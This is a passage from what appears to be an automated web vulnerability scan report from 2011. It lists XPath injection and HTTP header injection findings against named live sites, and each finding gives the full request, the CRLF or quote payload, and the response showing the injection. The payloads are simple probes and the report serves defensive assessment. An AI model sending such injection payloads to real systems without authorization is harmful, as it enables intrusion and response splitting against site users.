<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3.7. http://entertainment.redacted/video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /video'/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53218
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=6d4eeafde5e747ca8079be903574a601; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3.8. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248777
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://static.foxsports.com/cgi-bin/merge?files=/fe/js/spry/xpath.js,/fe/js/spry/SpryData.js,/fe/js/spry/SpryEffects.js,/fe/js/spry/SpryNestedXMLDataSet.js,/fe/js/spry/SpryDOMUtils.js,/fe/js/jQuery/jquery-1.3.min.js,/fe/js/jQuery/plugins/easySlider1.7.js,/fe/js/SWF/
...[SNIP]...

3.9. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248777
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://static.foxsports.com/cgi-bin/merge?files=/fe/js/spry/xpath.js,/fe/js/spry/SpryData.js,/fe/js/spry/SpryEffects.js,/fe/js/spry/SpryNestedXMLDataSet.js,/fe/js/spry/SpryDOMUtils.js,/fe/js/jQuery/jquery-1.3.min.js,/fe/js/jQuery/plugins/easySlider1.7.js,/fe/js/SWF/
...[SNIP]...

3.10. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175?1'=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248807
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 29 Jan 2011 23:50:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://static.foxsports.com/cgi-bin/merge?files=/fe/js/spry/xpath.js,/fe/js/spry/SpryData.js,/fe/js/spry/SpryEffects.js,/fe/js/spry/SpryNestedXMLDataSet.js,/fe/js/spry/SpryDOMUtils.js,/fe/js/jQuery/jquery-1.3.min.js,/fe/js/jQuery/plugins/easySlider1.7.js,/fe/js/SWF/
...[SNIP]...

3.11. http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://silverlight.codeplex.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /?1'=1 HTTP/1.1
Host: silverlight.codeplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n; domain=.codeplex.com; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:39 GMT
Content-Length: 28879


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" class="IE IE7 ">

<head id
...[SNIP]...
<div class="MostDownloadedDescription">Html Agility Pack is an agile HTML parser library that proposes a read&#47;write DOM and supports plain XPATH or XSLT. It allows you to parse &#34;out of t...</div>
...[SNIP]...

4. HTTP header injection
There are 16 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 65c2f%0d%0a643c70ed39b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=65c2f%0d%0a643c70ed39b

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:49:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 14:49:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 06:49:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=65c2f
643c70ed39b
_775684-wczsM-0; expires=Thu, 22-Mar-2012 06:49:37 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 1
Content-Type: text/html

;

4.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload a2e59%0d%0a154c4e3865 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779a2e59%0d%0a154c4e3865&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:41:00 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 01:40:59 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_852149-1-1; expires=Wed, 21-Mar-2012 17:41:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*GtsM-0; expires=Wed, 21-Mar-2012 17:41:00 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=852149&site=4-58143061-&code=40142779a2e59
154c4e3865

Content-Length: 0
Content-Type: text/html


4.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 2d2bc%0d%0aa1ed319a68a was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=852149&site=2d2bc%0d%0aa1ed319a68a&code=40142779&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:40:43 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 01:40:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_852149-1-1; expires=Wed, 21-Mar-2012 17:40:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-qGtsM-0; expires=Wed, 21-Mar-2012 17:40:43 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=852149&site=-1-2d2bc
a1ed319a68a
-&code=40142779
Content-Length: 0
Content-Type: text/html


4.4. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7a143%0d%0abd80344d819 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/?7a143%0d%0abd80344d819=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:06:20 GMT
X-DirectServer: whitepg_DS1
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://www.peoplefinders.com/redirect.aspx?7a143
bd80344d819
=1


4.5. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000e376b2c762f700000000/relocate=/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6cd1b%0d%0a5289c0c2c2e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adclick/CID=0000e376b2c762f700000000/relocate=/?6cd1b%0d%0a5289c0c2c2e=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:06:33 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /?6cd1b
5289c0c2c2e
=1


4.6. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000ed08b2c762f700000000/relocate=

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 89d41%0d%0a8fdda0bf760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate=?89d41%0d%0a8fdda0bf760=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:09:42 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: ?89d41
8fdda0bf760
=1


4.7. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000ed08b2c762f700000000/relocate=/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 19107%0d%0ab5b4e2d432b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate=/?19107%0d%0ab5b4e2d432b=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:06:38 GMT
X-DirectServer: whitepg_DS5
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /?19107
b5b4e2d432b
=1


4.8. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8543b%0d%0a8fd8777078a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bserver8543b%0d%0a8fd8777078a/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:45 GMT
X-DirectServer: whitepg_DS3
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver8543b
8fd8777078a
/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


4.9. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44838%0d%0acf1fcfc8e87 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /bserver/44838%0d%0acf1fcfc8e87/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:51 GMT
X-DirectServer: whitepg_DS1
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/44838
cf1fcfc8e87
